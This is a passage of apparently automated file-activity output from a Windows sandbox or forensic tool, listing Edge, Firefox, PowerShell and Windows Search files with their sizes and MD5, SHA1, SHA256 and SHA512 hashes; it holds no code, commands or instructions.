                                                                                                                                                                        f0cd8d0fe334c31c6d0853577bc228defe144a58141b02777ac8dc663449a4efbf8a4df6ffbe3d5b19179ee231869ceaecb7e44c4f8d046068c61facb11c4448

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        24KB

                                                                                                                                                                        MD5

                                                                                                                                                                        9b2345e425acf05ffaa1dee20d4fdbe7

                                                                                                                                                                        SHA1

                                                                                                                                                                        aecf86c5a5d24b77aea68f6bc99e7f42c9048bc3

                                                                                                                                                                        SHA256

                                                                                                                                                                        1eb6cc0eab0b222c1111dba69db74281366b9f5dc9f8707ff215b09155c58d14

                                                                                                                                                                        SHA512

                                                                                                                                                                        647fc97d693b709ef3b0877b6de1d4f9f4e1085d35b809d27360ede1be52b37f9a967fb80ce43be35d60b52409c7e4036376d7d931c96f0660a2eeffa58a8208

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        24KB

                                                                                                                                                                        MD5

                                                                                                                                                                        77006dacd174a80aa9b867f95d5df337

                                                                                                                                                                        SHA1

                                                                                                                                                                        7078db638c72ee5cf4ede7911e4421cc4ae103c7

                                                                                                                                                                        SHA256

                                                                                                                                                                        5e22af33da2ed3f3197d9c899a8fec5e2716b54be019c484cd59960da8f143d9

                                                                                                                                                                        SHA512

                                                                                                                                                                        e8268ed24af38eaebda4cd864e5580ed1bb63e3e4b72a27fe3404baeb7c8c944a7e79282712ac9d0b33f0123654dedb1984633d6ae2a5b412d6536e2b0389bb2

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                        Filesize

                                                                                                                                                                        116KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f70aa3fa04f0536280f872ad17973c3d

                                                                                                                                                                        SHA1

                                                                                                                                                                        50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                                                                                        SHA256

                                                                                                                                                                        8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                                                                                        SHA512

                                                                                                                                                                        30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                        SHA1

                                                                                                                                                                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                        SHA256

                                                                                                                                                                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                        SHA512

                                                                                                                                                                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        46295cac801e5d4857d09837238a6394

                                                                                                                                                                        SHA1

                                                                                                                                                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                        SHA256

                                                                                                                                                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                        SHA512

                                                                                                                                                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        0962291d6d367570bee5454721c17e11

                                                                                                                                                                        SHA1

                                                                                                                                                                        59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                                                        SHA256

                                                                                                                                                                        ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                                                        SHA512

                                                                                                                                                                        f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        7ca3084bad725611f2979ae21a6f0b60

                                                                                                                                                                        SHA1

                                                                                                                                                                        07818b726632b129663eb98c2d8ffb4539461a68

                                                                                                                                                                        SHA256

                                                                                                                                                                        b9313179d72f30f3c53be0d73459761af556f309db869705ec19407496cd45df

                                                                                                                                                                        SHA512

                                                                                                                                                                        439eb7aa8fa24ba33af5d3efa87eaed3e7b5144fe1d8c3586f03d2934a1efaea97a7911fa59d498e3468fd6bd075a008f4ef13b1fc9faf6bda60623a78a00818

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        10KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f632f0b9527f24f0e12fe717017781c1

                                                                                                                                                                        SHA1

                                                                                                                                                                        f792db9e9adfa0f72432d7ab76a48711b27a12a2

                                                                                                                                                                        SHA256

                                                                                                                                                                        9fc54406b64852191ede805d24131f1a96595f3a14ed468cdfde688ca6b45e54

                                                                                                                                                                        SHA512

                                                                                                                                                                        c858424995a158b521a5d9731fb982dbcfd74e71453ce9ca6c998c7b4a1111f058d3e0e26c82ff3b40b77459f4636c8ca2fe3955b12bc623679b374df009b6b4

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                                                                                        Filesize

                                                                                                                                                                        264KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                        SHA1

                                                                                                                                                                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                        SHA256

                                                                                                                                                                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                        SHA512

                                                                                                                                                                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                                                                                        Filesize

                                                                                                                                                                        64KB

                                                                                                                                                                        MD5

                                                                                                                                                                        987a07b978cfe12e4ce45e513ef86619

                                                                                                                                                                        SHA1

                                                                                                                                                                        22eec9a9b2e83ad33bedc59e3205f86590b7d40c

                                                                                                                                                                        SHA256

                                                                                                                                                                        f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8

                                                                                                                                                                        SHA512

                                                                                                                                                                        39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                                                                                                                                                        Filesize

                                                                                                                                                                        9KB

                                                                                                                                                                        MD5

                                                                                                                                                                        7050d5ae8acfbe560fa11073fef8185d

                                                                                                                                                                        SHA1

                                                                                                                                                                        5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                                                                                                                        SHA256

                                                                                                                                                                        cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                                                                                                                        SHA512

                                                                                                                                                                        a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        60b3262c3163ee3d466199160b9ed07d

                                                                                                                                                                        SHA1

                                                                                                                                                                        994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

                                                                                                                                                                        SHA256

                                                                                                                                                                        e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

                                                                                                                                                                        SHA512

                                                                                                                                                                        081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        63cec056e7a725ade57d764b3b5eb821

                                                                                                                                                                        SHA1

                                                                                                                                                                        7a5a594208274cbe70f2b32e48ee207320f0e32c

                                                                                                                                                                        SHA256

                                                                                                                                                                        379ea3c89c2137b2cc5aab316cfd89df4f4d000edf195af2ed3fc4531f05cd10

                                                                                                                                                                        SHA512

                                                                                                                                                                        2466050dc7a347df529d48e13434411f193174b4ac7e8844b5bc0d509281f37c1ca41cdb01eb9fe3460431336c6bd77c15c9fa287245b261979fae548f2911a0

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b4816d1848d7eebaa881bae9fdd4f932

                                                                                                                                                                        SHA1

                                                                                                                                                                        6097a2839f6063568d47475bf08fb79deb17b1da

                                                                                                                                                                        SHA256

                                                                                                                                                                        3731000089b4462def922daad4f5bcfe243ce8c784afd404599a7e5474abb754

                                                                                                                                                                        SHA512

                                                                                                                                                                        bedcc3f98d13a2a6543a30eda117f12b36d9484c88f05718bcb10dd3cd30cb4add9344b919efc619467e414b9a8bf94bb5ccc304d3e64c82efb0884cca14f66d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        aafbdb3c07cdd80320ab27b863b5437d

                                                                                                                                                                        SHA1

                                                                                                                                                                        6fd1dd650e6d5248d17a8400445b56dc2d59315b

                                                                                                                                                                        SHA256

                                                                                                                                                                        22bc5b85f76bdfbe30f699c832183f2be1985e7106b8af86f66e1a360b7a1c17

                                                                                                                                                                        SHA512

                                                                                                                                                                        268496f2db5b511301bb4f1088229ae94b54c905984d46c8032330020c120efe8ead7c7df214214ad34b59f039c79cec7bbaa0d6af4013d0bd99cd0f809a1f53

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        df9654b31a6fe016b891a0e41f60de7b

                                                                                                                                                                        SHA1

                                                                                                                                                                        a9cf29177e7fcd74da50df32ec9c99ad826526ae

                                                                                                                                                                        SHA256

                                                                                                                                                                        7c3ec48ce2dcb95eaaa7b32957f1b282ae5fc3e0e71358d939f91fcdd99bf093

                                                                                                                                                                        SHA512

                                                                                                                                                                        fab579769613cf611ad6318f95881c8ebee1d202e8c72025002861cdd884ce571ec3a76262686045a8e1bb361ae851c683476126cc9ef7585705cfa9c7615f0f

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        6a807b1c91ac66f33f88a787d64904c1

                                                                                                                                                                        SHA1

                                                                                                                                                                        83c554c7de04a8115c9005709e5cd01fca82c5d3

                                                                                                                                                                        SHA256

                                                                                                                                                                        155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

                                                                                                                                                                        SHA512

                                                                                                                                                                        29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        64B

                                                                                                                                                                        MD5

                                                                                                                                                                        31ccf6922301f28200123c6157e31d11

                                                                                                                                                                        SHA1

                                                                                                                                                                        d0e39aed0a9f5135ab5f2533b3890650fa46854a

                                                                                                                                                                        SHA256

                                                                                                                                                                        c65718b9bd378bb4eb754a55d9a3b1a8940bbe775cdcb39e38a5234a450f744f

                                                                                                                                                                        SHA512

                                                                                                                                                                        caa096a000e0ae4d3ca6a82331e3e996f2d3cf58932904295fdf04aa3dffe28b10f2a3367f748f56684d6ff7b7d1dfc31c8faa254722764af159b62d1fbdf283

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        851cfd418cdd61ba01242f4ba0345e89

                                                                                                                                                                        SHA1

                                                                                                                                                                        1ef2652a038b130bdb4b8615123de274222fda14

                                                                                                                                                                        SHA256

                                                                                                                                                                        699f620949ddd394b8ae261f030978c1ad72c55c3c92929041a795dbe73d0fab

                                                                                                                                                                        SHA512

                                                                                                                                                                        4cc537fbe491e50f632a440d5585bd52253577a7b4f5996f35f97ffd78b3f3559c556a5c521d63981f5c1ab132657f778b963c294b79ee66ffe2989d36490b4c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c67441dfa09f61bca500bb43407c56b8

                                                                                                                                                                        SHA1

                                                                                                                                                                        5a56cf7cbeb48c109e2128c31b681fac3959157b

                                                                                                                                                                        SHA256

                                                                                                                                                                        63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

                                                                                                                                                                        SHA512

                                                                                                                                                                        325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        70141b44898d3dfc403963f4a315d73e

                                                                                                                                                                        SHA1

                                                                                                                                                                        25e0db32a2718a68c09feb0bfb2ea1d3cda7c921

                                                                                                                                                                        SHA256

                                                                                                                                                                        a8355fcf8fb10c1b146451b4e1c7e6aed1fa4e5c87251eaf31763a83d585a7c2

                                                                                                                                                                        SHA512

                                                                                                                                                                        62c0d252c5468ef95db6cfe3b7d40aa756ba9d6df7033ed3065e715ec42e804c82abdf714faa421442fe652efe351bd0e0076575b6e0e22fea277d9c7a9c4e13

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5d2f8331251ba32c496e836eebf1dda0

                                                                                                                                                                        SHA1

                                                                                                                                                                        e53f5c2ff26f237f5cc8d400e89973afcd05a68b

                                                                                                                                                                        SHA256

                                                                                                                                                                        bd0a86b7f7128969cc26c91f0cb0fa1bfb75b26cc5070aab7d35d0b005f399e3

                                                                                                                                                                        SHA512

                                                                                                                                                                        a6f8047cba6216879e213a6d56a43877687c670bf4aa967cca7c89b64589f9bb2007adb8f0d7926e9f46bb9c9878abf7e5af8675a952f465c7d43e281f5ac05b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5ff8fd3a61f91abe211d7ecd74f66153

                                                                                                                                                                        SHA1

                                                                                                                                                                        a34c465ac57aa7226b81ae995433b30883e6aef7

                                                                                                                                                                        SHA256

                                                                                                                                                                        3cdf2dffd358ac1769a3c0b25ec4fe193b2520228c656cc1f91d92d2623d57b1

                                                                                                                                                                        SHA512

                                                                                                                                                                        b7a49c896e604975493972654d42053153d01c19094fe0104d0c8796d7172dcd59199756620d42c9d0ce46eba1aa45b1dc1f9177b15abbad6164fd05789c97ad

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9enwga8g.default-release\activity-stream.discovery_stream.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        19KB

                                                                                                                                                                        MD5

                                                                                                                                                                        1884a8340d5b869ff9c8244f809e8c83

                                                                                                                                                                        SHA1

                                                                                                                                                                        5d474cd9054c5d9411a1bc2c4779dc6263ffad3f

                                                                                                                                                                        SHA256

                                                                                                                                                                        3228f2a028b33abaf8c59673137cf13ace94753b76a64faa833cdee58ef33a8e

                                                                                                                                                                        SHA512

                                                                                                                                                                        a66cc85c417751cde9bef67d76861075f10709c8475d842823c8a7939f111a29ee6f9c1b91d55ed41ac0bc8726d98cc421408a9f5f178c72cb05c42d613f2d4c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GRZVKQJP\microsoft.windows[1].xml

                                                                                                                                                                        Filesize

                                                                                                                                                                        97B

                                                                                                                                                                        MD5

                                                                                                                                                                        a7508c1b0b13db90caa6db05460aa78d

                                                                                                                                                                        SHA1

                                                                                                                                                                        cf92a108078cfcb920eb1b0a6bc809c5fc61544a

                                                                                                                                                                        SHA256

                                                                                                                                                                        29450d5cedbae51784499a95e98c79268ed85427580baa69a17e2441f07b2feb

                                                                                                                                                                        SHA512

                                                                                                                                                                        7d0dfd9810e703518abbcc958484a0edb318cdcd7f83ee76c81ec05533ddc89f032bfbd1ace0eac855a882e6957a9dc417f594c81706b8bcfbd9ba9c29626268

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{01f33767-7db7-4e50-95af-6b7f3e4ebf36}\0.0.filtertrie.intermediate.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        8609241ac301971b563b8864447f5fbc

                                                                                                                                                                        SHA1

                                                                                                                                                                        81b1e9382f7012f2441efcec40a5aabf46f34397

                                                                                                                                                                        SHA256

                                                                                                                                                                        94d0c4ea1f705b557a8dd983931ecab83f4d19e691669f2723781d406d38a282

                                                                                                                                                                        SHA512

                                                                                                                                                                        e536d2ae24ee17df34e28bcd1220f20901ec9b19a6f69b0c87f82a6535c813737681496927d9bea0b90e33b7c8236c77790a55d9a8514f5084ed3ad16d71c554

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\0.1.filtertrie.intermediate.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        5B

                                                                                                                                                                        MD5

                                                                                                                                                                        34bd1dfb9f72cf4f86e6df6da0a9e49a

                                                                                                                                                                        SHA1

                                                                                                                                                                        5f96d66f33c81c0b10df2128d3860e3cb7e89563

                                                                                                                                                                        SHA256

                                                                                                                                                                        8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

                                                                                                                                                                        SHA512

                                                                                                                                                                        e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\0.2.filtertrie.intermediate.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        5B

                                                                                                                                                                        MD5

                                                                                                                                                                        c204e9faaf8565ad333828beff2d786e

                                                                                                                                                                        SHA1

                                                                                                                                                                        7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

                                                                                                                                                                        SHA256

                                                                                                                                                                        d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

                                                                                                                                                                        SHA512

                                                                                                                                                                        e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\Apps.ft

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        6c78adbcc2f3ba7a2ad306983176414c

                                                                                                                                                                        SHA1

                                                                                                                                                                        484787d9aef671594b4d91b6c7d2d5c215f46260

                                                                                                                                                                        SHA256

                                                                                                                                                                        8f2abe81c4d834b96b5e39b504949cd04aef23e290309b413f501b396efd381a

                                                                                                                                                                        SHA512

                                                                                                                                                                        69bb126822ee7008d30135f7c216bf364e8e70ec5ca09cff58671d3c29081f467719bedb172cc14962aeeef22c34fb7e4c4a6aed26c26691a4cfef3816138c69

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\Apps.index

                                                                                                                                                                        Filesize

                                                                                                                                                                        879KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5e4ec42046e35b20c1b8d97c17926572

                                                                                                                                                                        SHA1

                                                                                                                                                                        d0f371a97b676240bd90f9fa1a0b14f97f9b1016

                                                                                                                                                                        SHA256

                                                                                                                                                                        6a8c0c8cc58a866d0b874926f0ff1e2034a60bb18a2c584dd7f100be49c0febc

                                                                                                                                                                        SHA512

                                                                                                                                                                        d8bc115f3e0632aa6df6d1ca949e53a5724eff26c9d42d90686df0aea777a00b6c3d1738adf7807c7c752f5f702c4bce1bee158d1f9e765a0148c960ea0113af

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\apps.csg

                                                                                                                                                                        Filesize

                                                                                                                                                                        444B

                                                                                                                                                                        MD5

                                                                                                                                                                        5475132f1c603298967f332dc9ffb864

                                                                                                                                                                        SHA1

                                                                                                                                                                        4749174f29f34c7d75979c25f31d79774a49ea46

                                                                                                                                                                        SHA256

                                                                                                                                                                        0b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd

                                                                                                                                                                        SHA512

                                                                                                                                                                        54433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\apps.schema

                                                                                                                                                                        Filesize

                                                                                                                                                                        150B

                                                                                                                                                                        MD5

                                                                                                                                                                        1659677c45c49a78f33551da43494005

                                                                                                                                                                        SHA1

                                                                                                                                                                        ae588ef3c9ea7839be032ab4323e04bc260d9387

                                                                                                                                                                        SHA256

                                                                                                                                                                        5af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb

                                                                                                                                                                        SHA512

                                                                                                                                                                        740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\appsconversions.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.4MB

                                                                                                                                                                        MD5

                                                                                                                                                                        2bef0e21ceb249ffb5f123c1e5bd0292

                                                                                                                                                                        SHA1

                                                                                                                                                                        86877a464a0739114e45242b9d427e368ebcc02c

                                                                                                                                                                        SHA256

                                                                                                                                                                        8b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307

                                                                                                                                                                        SHA512

                                                                                                                                                                        f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\appsglobals.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        343KB

                                                                                                                                                                        MD5

                                                                                                                                                                        931b27b3ec2c5e9f29439fba87ec0dc9

                                                                                                                                                                        SHA1

                                                                                                                                                                        dd5e78f004c55bbebcd1d66786efc5ca4575c9b4

                                                                                                                                                                        SHA256

                                                                                                                                                                        541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e

                                                                                                                                                                        SHA512

                                                                                                                                                                        4ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\appssynonyms.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        237KB

                                                                                                                                                                        MD5

                                                                                                                                                                        06a69ad411292eca66697dc17898e653

                                                                                                                                                                        SHA1

                                                                                                                                                                        fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d

                                                                                                                                                                        SHA256

                                                                                                                                                                        2aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1

                                                                                                                                                                        SHA512

                                                                                                                                                                        ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133797145603346924.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        3KB

                                                                                                                                                                        MD5

                                                                                                                                                                        6c7c5879f1c75b60ca6fe7048fdf88b6

                                                                                                                                                                        SHA1

                                                                                                                                                                        e3faf0e19132003dfc8617a40933f760ec6b64c4

                                                                                                                                                                        SHA256

                                                                                                                                                                        5391afca6e19b795f4790c36b762d967859b8dcab7f34f40cd3e9d02fb8ab74c

                                                                                                                                                                        SHA512

                                                                                                                                                                        23a865f4b8d9b04b85d85c7e81a24ca6e28b12ad74acc9256ac564b437adeb0c64cb5fdfc723dde91f38a6c9363e63350791eba9d9217d67b9b387ea8ec209bb

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        689KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2dee0ab82c5db228dee2de2fe0d82eb3

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6231ad00bd775537fb422a86bfe2b5754e9b91d

                                                                                                                                                                        SHA256

                                                                                                                                                                        0e01a47917642eac553b6d0feb6e97b398f7af84c5ffc74ba35ca66d7a341d39

                                                                                                                                                                        SHA512

                                                                                                                                                                        c46ae09aab1f240ba384044ef46240a4cb02b6144b0403d690ff7ddcf79acc67da345c98254ef5436a4008fb419c889af43489fedf86e8ba822128365f30763f

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        c4e1be9591f08920290d6cce9dc80852

                                                                                                                                                                        SHA1

                                                                                                                                                                        f90ee67da232d4b6f9bc657f07643de793fd167d

                                                                                                                                                                        SHA256

                                                                                                                                                                        0a30381b54ef4f56a1d594147f9c9ef3bf5b244df00c5bd99d7e504a955ea0be

                                                                                                                                                                        SHA512

                                                                                                                                                                        1f75a60ae9d454a13fa6ea3789c3581433efae2ce858484c9db6fb3457f23b3fa527ecf2d0aa9275a007e7c0f19b7dd1fce7f65569ff7063b41a0e3e2004661a

